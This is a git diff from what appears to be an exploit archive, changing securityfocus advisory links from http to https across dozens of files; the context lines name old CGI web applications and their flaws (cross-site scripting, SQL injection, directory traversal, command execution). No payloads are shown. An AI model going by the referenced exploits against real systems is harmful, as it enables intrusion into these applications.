@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15974/info +source: https://www.securityfocus.com/bid/15974/info Portfolio Netpublish Server is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26917.txt b/exploits/cgi/webapps/26917.txt index f19ca4be0..2ec41d005 100644 --- a/exploits/cgi/webapps/26917.txt +++ b/exploits/cgi/webapps/26917.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15990/info +source: https://www.securityfocus.com/bid/15990/info LiveJournal is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cgi/webapps/26933.txt b/exploits/cgi/webapps/26933.txt index 07a90e696..562aa3605 100644 --- a/exploits/cgi/webapps/26933.txt +++ b/exploits/cgi/webapps/26933.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16011/info +source: https://www.securityfocus.com/bid/16011/info ProjectApp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26937.txt b/exploits/cgi/webapps/26937.txt index d172e7bf2..7f26f622a 100644 --- a/exploits/cgi/webapps/26937.txt +++ b/exploits/cgi/webapps/26937.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16013/info +source: https://www.securityfocus.com/bid/16013/info ComputerOil Redakto CMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27021.txt b/exploits/cgi/webapps/27021.txt index efceb8ac0..8c725109e 100644 --- a/exploits/cgi/webapps/27021.txt +++ b/exploits/cgi/webapps/27021.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16119/info +source: https://www.securityfocus.com/bid/16119/info DiscusWare Discus is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27061.txt b/exploits/cgi/webapps/27061.txt index 2f9f144b5..a796ce274 100644 --- a/exploits/cgi/webapps/27061.txt +++ b/exploits/cgi/webapps/27061.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16195/info +source: https://www.securityfocus.com/bid/16195/info Hummingbird Enterprise Collaboration is prone to multiple vulnerabilities. diff --git a/exploits/cgi/webapps/27062.txt b/exploits/cgi/webapps/27062.txt index ac5bc90bf..f1b60d323 100644 --- a/exploits/cgi/webapps/27062.txt +++ b/exploits/cgi/webapps/27062.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16195/info +source: https://www.securityfocus.com/bid/16195/info Hummingbird Enterprise Collaboration is prone to multiple vulnerabilities. diff --git a/exploits/cgi/webapps/27081.txt b/exploits/cgi/webapps/27081.txt index 947927e8c..2e4a4f4cb 100644 --- a/exploits/cgi/webapps/27081.txt +++ b/exploits/cgi/webapps/27081.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16239/info +source: https://www.securityfocus.com/bid/16239/info Ultimate Auction is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27088.txt b/exploits/cgi/webapps/27088.txt index 77cbf2e67..dc7e1943e 100644 --- a/exploits/cgi/webapps/27088.txt +++ b/exploits/cgi/webapps/27088.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16251/info +source: https://www.securityfocus.com/bid/16251/info Faq-O-Matic is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/cgi/webapps/27091.txt b/exploits/cgi/webapps/27091.txt index e95128a06..d28ee8ab7 100644 --- a/exploits/cgi/webapps/27091.txt +++ b/exploits/cgi/webapps/27091.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16254/info +source: https://www.securityfocus.com/bid/16254/info Ultimate Auction is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27115.txt b/exploits/cgi/webapps/27115.txt index 51c0fd0ef..b976c156f 100644 --- a/exploits/cgi/webapps/27115.txt +++ b/exploits/cgi/webapps/27115.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16330/info +source: https://www.securityfocus.com/bid/16330/info MailSite is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27141.txt b/exploits/cgi/webapps/27141.txt index 31a8f0592..54c03880d 100644 --- a/exploits/cgi/webapps/27141.txt +++ b/exploits/cgi/webapps/27141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16401/info +source: https://www.securityfocus.com/bid/16401/info Face Control is prone to multiple directory-traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27163.txt b/exploits/cgi/webapps/27163.txt index 113d7159a..63782a519 100644 --- a/exploits/cgi/webapps/27163.txt +++ b/exploits/cgi/webapps/27163.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16494/info +source: https://www.securityfocus.com/bid/16494/info Tivoli Access Manager Plugin for Web Servers is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/cgi/webapps/27451.txt b/exploits/cgi/webapps/27451.txt index 3c3eb8a05..702ea3422 100644 --- a/exploits/cgi/webapps/27451.txt +++ b/exploits/cgi/webapps/27451.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17170/info +source: https://www.securityfocus.com/bid/17170/info MPKI 6.0 is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27464.txt b/exploits/cgi/webapps/27464.txt index 0fe6b8a5d..6791f7004 100644 --- a/exploits/cgi/webapps/27464.txt +++ b/exploits/cgi/webapps/27464.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17224/info +source: https://www.securityfocus.com/bid/17224/info MySQL Based Message Board is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/cgi/webapps/27488.txt b/exploits/cgi/webapps/27488.txt index 6a6b5f7c1..d07d64349 100644 --- a/exploits/cgi/webapps/27488.txt +++ b/exploits/cgi/webapps/27488.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17265/info +source: https://www.securityfocus.com/bid/17265/info BlankOL is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27561.txt b/exploits/cgi/webapps/27561.txt index 17ed7704a..9e24a4933 100644 --- a/exploits/cgi/webapps/27561.txt +++ b/exploits/cgi/webapps/27561.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17359/info +source: https://www.securityfocus.com/bid/17359/info Web-App.Org and Web-App.Net are prone to multiple cross-site scripting vulnerabilities because the applications fail to properly sanitize user-supplied input. 
diff --git a/exploits/cgi/webapps/27562.txt b/exploits/cgi/webapps/27562.txt index 9a904db9d..745c5c091 100644 --- a/exploits/cgi/webapps/27562.txt +++ b/exploits/cgi/webapps/27562.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17359/info +source: https://www.securityfocus.com/bid/17359/info Web-App.Org and Web-App.Net are prone to multiple cross-site scripting vulnerabilities because the applications fail to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27583.txt b/exploits/cgi/webapps/27583.txt index f84ed6bae..03a55c328 100644 --- a/exploits/cgi/webapps/27583.txt +++ b/exploits/cgi/webapps/27583.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17418/info +source: https://www.securityfocus.com/bid/17418/info Web+ Shop is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27594.txt b/exploits/cgi/webapps/27594.txt index 7684ef5e3..77a1a6584 100644 --- a/exploits/cgi/webapps/27594.txt +++ b/exploits/cgi/webapps/27594.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17438/info +source: https://www.securityfocus.com/bid/17438/info Guestbook is prone to multiple HTML-injection vulnerabilities; the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cgi/webapps/27620.txt b/exploits/cgi/webapps/27620.txt index 74975d2d7..b0ab87802 100644 --- a/exploits/cgi/webapps/27620.txt +++ b/exploits/cgi/webapps/27620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17452/info +source: https://www.securityfocus.com/bid/17452/info Microsoft FrontPage Server Extensions are prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before it is rendered to other users. 
diff --git a/exploits/cgi/webapps/27631.txt b/exploits/cgi/webapps/27631.txt index 5425fe18c..772a45455 100644 --- a/exploits/cgi/webapps/27631.txt +++ b/exploits/cgi/webapps/27631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17485/info +source: https://www.securityfocus.com/bid/17485/info interaktiv.shop is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27672.txt b/exploits/cgi/webapps/27672.txt index 586261eed..7c9bf581f 100644 --- a/exploits/cgi/webapps/27672.txt +++ b/exploits/cgi/webapps/27672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17584/info +source: https://www.securityfocus.com/bid/17584/info The axoverzicht.cgi script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27679.txt b/exploits/cgi/webapps/27679.txt index 8b0e60f01..adff8bc4e 100644 --- a/exploits/cgi/webapps/27679.txt +++ b/exploits/cgi/webapps/27679.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17598/info +source: https://www.securityfocus.com/bid/17598/info Visale is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27680.txt b/exploits/cgi/webapps/27680.txt index fd15751a7..94c605346 100644 --- a/exploits/cgi/webapps/27680.txt +++ b/exploits/cgi/webapps/27680.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17598/info +source: https://www.securityfocus.com/bid/17598/info Visale is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27681.txt b/exploits/cgi/webapps/27681.txt index dd23e7c07..f0ba545d4 100644 
--- a/exploits/cgi/webapps/27681.txt +++ b/exploits/cgi/webapps/27681.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17598/info +source: https://www.securityfocus.com/bid/17598/info Visale is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27682.txt b/exploits/cgi/webapps/27682.txt index 1ab0b8490..8e1e37450 100644 --- a/exploits/cgi/webapps/27682.txt +++ b/exploits/cgi/webapps/27682.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17602/info +source: https://www.securityfocus.com/bid/17602/info CommuniMail is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27683.txt b/exploits/cgi/webapps/27683.txt index 8084a756f..26d4274c0 100644 --- a/exploits/cgi/webapps/27683.txt +++ b/exploits/cgi/webapps/27683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17602/info +source: https://www.securityfocus.com/bid/17602/info CommuniMail is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27685.txt b/exploits/cgi/webapps/27685.txt index 1f601f962..e5f877593 100644 --- a/exploits/cgi/webapps/27685.txt +++ b/exploits/cgi/webapps/27685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17605/info +source: https://www.securityfocus.com/bid/17605/info IntelliLink Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27686.txt b/exploits/cgi/webapps/27686.txt index 8ef683bc6..6749cbfdb 100644 --- a/exploits/cgi/webapps/27686.txt +++ b/exploits/cgi/webapps/27686.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17605/info +source: https://www.securityfocus.com/bid/17605/info IntelliLink Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27689.txt b/exploits/cgi/webapps/27689.txt index 7775b309f..4d0e4d5b1 100644 --- a/exploits/cgi/webapps/27689.txt +++ b/exploits/cgi/webapps/27689.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17613/info +source: https://www.securityfocus.com/bid/17613/info BannerFarm is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27690.txt b/exploits/cgi/webapps/27690.txt index eb9826f4d..0580c600b 100644 --- a/exploits/cgi/webapps/27690.txt +++ b/exploits/cgi/webapps/27690.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17614/info +source: https://www.securityfocus.com/bid/17614/info xFlow is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27691.txt b/exploits/cgi/webapps/27691.txt index 1e205356b..0fecd2704 100644 --- a/exploits/cgi/webapps/27691.txt +++ b/exploits/cgi/webapps/27691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17614/info +source: https://www.securityfocus.com/bid/17614/info xFlow is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27694.txt b/exploits/cgi/webapps/27694.txt index 144e06c58..628efd096 100644 --- a/exploits/cgi/webapps/27694.txt 
+++ b/exploits/cgi/webapps/27694.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17621/info +source: https://www.securityfocus.com/bid/17621/info AWStats is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27695.txt b/exploits/cgi/webapps/27695.txt index 849882db5..20f55aa7a 100644 --- a/exploits/cgi/webapps/27695.txt +++ b/exploits/cgi/webapps/27695.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17622/info +source: https://www.securityfocus.com/bid/17622/info Net Clubs Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27696.txt b/exploits/cgi/webapps/27696.txt index ed3c304b7..caddf7e93 100644 --- a/exploits/cgi/webapps/27696.txt +++ b/exploits/cgi/webapps/27696.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17622/info +source: https://www.securityfocus.com/bid/17622/info Net Clubs Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27697.txt b/exploits/cgi/webapps/27697.txt index 2623fa758..2d3635d12 100644 --- a/exploits/cgi/webapps/27697.txt +++ b/exploits/cgi/webapps/27697.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17622/info +source: https://www.securityfocus.com/bid/17622/info Net Clubs Pro is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27712.txt b/exploits/cgi/webapps/27712.txt index 227f62681..da2cd6f1c 100644 --- a/exploits/cgi/webapps/27712.txt +++ b/exploits/cgi/webapps/27712.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17628/info +source: https://www.securityfocus.com/bid/17628/info Portal Pack is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27728.txt b/exploits/cgi/webapps/27728.txt index d9846d27a..124870a61 100644 --- a/exploits/cgi/webapps/27728.txt +++ b/exploits/cgi/webapps/27728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17663/info +source: https://www.securityfocus.com/bid/17663/info Blender is susceptible to a Python code-execution vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input before using it in a Python 'eval' statement. diff --git a/exploits/cgi/webapps/27761.txt b/exploits/cgi/webapps/27761.txt index 23a68c0f0..ed6dd9923 100644 --- a/exploits/cgi/webapps/27761.txt +++ b/exploits/cgi/webapps/27761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17728/info +source: https://www.securityfocus.com/bid/17728/info NeoMail is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/27895.txt b/exploits/cgi/webapps/27895.txt index 0843fe9d3..d233f697a 100644 --- a/exploits/cgi/webapps/27895.txt +++ b/exploits/cgi/webapps/27895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18024/info +source: https://www.securityfocus.com/bid/18024/info Cosmoshop is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/cgi/webapps/28321.pl b/exploits/cgi/webapps/28321.pl index e66ca6c71..5261f62f9 100755 --- a/exploits/cgi/webapps/28321.pl +++ b/exploits/cgi/webapps/28321.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19276/info +source: https://www.securityfocus.com/bid/19276/info Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, access-validation issue, and a remote command-execution issue. diff --git a/exploits/cgi/webapps/28514.txt b/exploits/cgi/webapps/28514.txt index 0b2a5495e..b20f77a8b 100644 --- a/exploits/cgi/webapps/28514.txt +++ b/exploits/cgi/webapps/28514.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19960/info +source: https://www.securityfocus.com/bid/19960/info SQL-Ledger and LedgerSMB are prone to a remote directory-traversal vulnerability. diff --git a/exploits/cgi/webapps/28570.txt b/exploits/cgi/webapps/28570.txt index 0fa00884b..da0c6fecf 100644 --- a/exploits/cgi/webapps/28570.txt +++ b/exploits/cgi/webapps/28570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20021/info +source: https://www.securityfocus.com/bid/20021/info Mailman is prone to multiple input-validation vulnerabilities because the application fails to sanitize user-input. These issues include multiple cross-site scripting vulnerabilities and a CRLF-injection vulnerability. diff --git a/exploits/cgi/webapps/29221.txt b/exploits/cgi/webapps/29221.txt index f58a12c28..8d5325dad 100644 --- a/exploits/cgi/webapps/29221.txt +++ b/exploits/cgi/webapps/29221.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21419/info +source: https://www.securityfocus.com/bid/21419/info BlueSocket BSC 2100 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29275.txt b/exploits/cgi/webapps/29275.txt index 11aad10cd..648ad6e14 100644 --- a/exploits/cgi/webapps/29275.txt +++ b/exploits/cgi/webapps/29275.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21534/info +source: https://www.securityfocus.com/bid/21534/info Netwin SurgeFTP is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29390.txt b/exploits/cgi/webapps/29390.txt index 146bb0deb..c80d833bc 100644 --- a/exploits/cgi/webapps/29390.txt +++ b/exploits/cgi/webapps/29390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21890/info +source: https://www.securityfocus.com/bid/21890/info EditTag is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/29391.txt b/exploits/cgi/webapps/29391.txt index 7157c091a..5b48a386a 100644 --- a/exploits/cgi/webapps/29391.txt +++ b/exploits/cgi/webapps/29391.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21890/info +source: https://www.securityfocus.com/bid/21890/info EditTag is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/29392.txt b/exploits/cgi/webapps/29392.txt index 534cb911e..7ced55f69 100644 --- a/exploits/cgi/webapps/29392.txt +++ b/exploits/cgi/webapps/29392.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21890/info +source: https://www.securityfocus.com/bid/21890/info EditTag is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/29393.txt b/exploits/cgi/webapps/29393.txt index 9e2ea0d32..225a43275 100644 --- a/exploits/cgi/webapps/29393.txt +++ b/exploits/cgi/webapps/29393.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21890/info +source: https://www.securityfocus.com/bid/21890/info EditTag is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/webapps/29394.txt b/exploits/cgi/webapps/29394.txt index df2d02ebc..123fdbab0 100644 --- a/exploits/cgi/webapps/29394.txt +++ b/exploits/cgi/webapps/29394.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21891/info +source: https://www.securityfocus.com/bid/21891/info EditTag is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29395.txt b/exploits/cgi/webapps/29395.txt index 59d2ac67f..f0a675e0b 100644 --- a/exploits/cgi/webapps/29395.txt +++ b/exploits/cgi/webapps/29395.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21891/info +source: https://www.securityfocus.com/bid/21891/info EditTag is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29396.txt b/exploits/cgi/webapps/29396.txt index a7c0a8598..357985716 100644 --- a/exploits/cgi/webapps/29396.txt +++ b/exploits/cgi/webapps/29396.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21891/info +source: https://www.securityfocus.com/bid/21891/info EditTag is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29623.txt b/exploits/cgi/webapps/29623.txt index b463a65e3..fd7542223 100644 --- a/exploits/cgi/webapps/29623.txt +++ b/exploits/cgi/webapps/29623.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22650/info +source: https://www.securityfocus.com/bid/22650/info Google Desktop is prone to a cross-site scripting weakness because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29761.txt b/exploits/cgi/webapps/29761.txt index 5fd93a41e..17cd82674 100644 --- a/exploits/cgi/webapps/29761.txt +++ b/exploits/cgi/webapps/29761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23034/info +source: https://www.securityfocus.com/bid/23034/info LedgerSMB/SQL-Ledger are prone to a local file-include vulnerability because the application fails to sufficiently sanitize user-supplied input. SQL-Ledger is also prone to an authentication-bypass vulnerability. diff --git a/exploits/cgi/webapps/29842.txt b/exploits/cgi/webapps/29842.txt index e3f88957f..6a5dfb787 100644 --- a/exploits/cgi/webapps/29842.txt +++ b/exploits/cgi/webapps/29842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23422/info +source: https://www.securityfocus.com/bid/23422/info The 'cosign' application is prone to an authentication-bypass vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29844.txt b/exploits/cgi/webapps/29844.txt index 8d14fe164..5eb10c665 100644 --- a/exploits/cgi/webapps/29844.txt +++ b/exploits/cgi/webapps/29844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23424/info +source: https://www.securityfocus.com/bid/23424/info The 'cosign' application is prone to an authentication-bypass vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/29962.txt b/exploits/cgi/webapps/29962.txt index 9f155b803..a495cd50d 100644 --- a/exploits/cgi/webapps/29962.txt +++ b/exploits/cgi/webapps/29962.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23862/info +source: https://www.securityfocus.com/bid/23862/info OTRS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30199.txt b/exploits/cgi/webapps/30199.txt index d79b79000..ccf24a4d6 100644 --- a/exploits/cgi/webapps/30199.txt +++ b/exploits/cgi/webapps/30199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24516/info +source: https://www.securityfocus.com/bid/24516/info WebIf is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30260.txt b/exploits/cgi/webapps/30260.txt index f1f7f457c..04d6755a3 100644 --- a/exploits/cgi/webapps/30260.txt +++ b/exploits/cgi/webapps/30260.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24743/info +source: https://www.securityfocus.com/bid/24743/info Yoggie Pico and Pico Pro are prone to a remote code-execution vulnerability because the device fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30263.txt b/exploits/cgi/webapps/30263.txt index 832ea8dd1..2cf47003d 100644 --- a/exploits/cgi/webapps/30263.txt +++ b/exploits/cgi/webapps/30263.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24754/info +source: https://www.securityfocus.com/bid/24754/info Oliver is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30440.txt b/exploits/cgi/webapps/30440.txt index 40ec3d684..8b9f7d319 100644 --- a/exploits/cgi/webapps/30440.txt +++ b/exploits/cgi/webapps/30440.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25148/info +source: https://www.securityfocus.com/bid/25148/info WebEvent is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. 
diff --git a/exploits/cgi/webapps/30585.txt b/exploits/cgi/webapps/30585.txt index 4df5a6535..18c615457 100644 --- a/exploits/cgi/webapps/30585.txt +++ b/exploits/cgi/webapps/30585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25678/info +source: https://www.securityfocus.com/bid/25678/info Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability. diff --git a/exploits/cgi/webapps/30586.txt b/exploits/cgi/webapps/30586.txt index 2f8962dc4..88befc935 100644 --- a/exploits/cgi/webapps/30586.txt +++ b/exploits/cgi/webapps/30586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25678/info +source: https://www.securityfocus.com/bid/25678/info Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability. diff --git a/exploits/cgi/webapps/30587.txt b/exploits/cgi/webapps/30587.txt index cc7680561..72dbf97d1 100644 --- a/exploits/cgi/webapps/30587.txt +++ b/exploits/cgi/webapps/30587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25678/info +source: https://www.securityfocus.com/bid/25678/info Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability. diff --git a/exploits/cgi/webapps/30591.txt b/exploits/cgi/webapps/30591.txt index 411ca0bde..8f5b77b57 100644 --- a/exploits/cgi/webapps/30591.txt +++ b/exploits/cgi/webapps/30591.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25694/info +source: https://www.securityfocus.com/bid/25694/info Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data. diff --git a/exploits/cgi/webapps/30597.txt b/exploits/cgi/webapps/30597.txt index 16a9c933d..85b646b4b 100644 --- a/exploits/cgi/webapps/30597.txt +++ b/exploits/cgi/webapps/30597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25738/info +source: https://www.securityfocus.com/bid/25738/info The LevelOne WBR3404TX Broadband Router is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input. These issues occurs in the web management panel. diff --git a/exploits/cgi/webapps/30598.txt b/exploits/cgi/webapps/30598.txt index 71cf584db..b20faaef7 100644 --- a/exploits/cgi/webapps/30598.txt +++ b/exploits/cgi/webapps/30598.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25744/info +source: https://www.securityfocus.com/bid/25744/info WebBatch is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30599.txt b/exploits/cgi/webapps/30599.txt index d57c86d4d..fac01ff9a 100644 --- a/exploits/cgi/webapps/30599.txt +++ b/exploits/cgi/webapps/30599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25744/info +source: https://www.securityfocus.com/bid/25744/info WebBatch is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/cgi/webapps/30606.txt b/exploits/cgi/webapps/30606.txt index 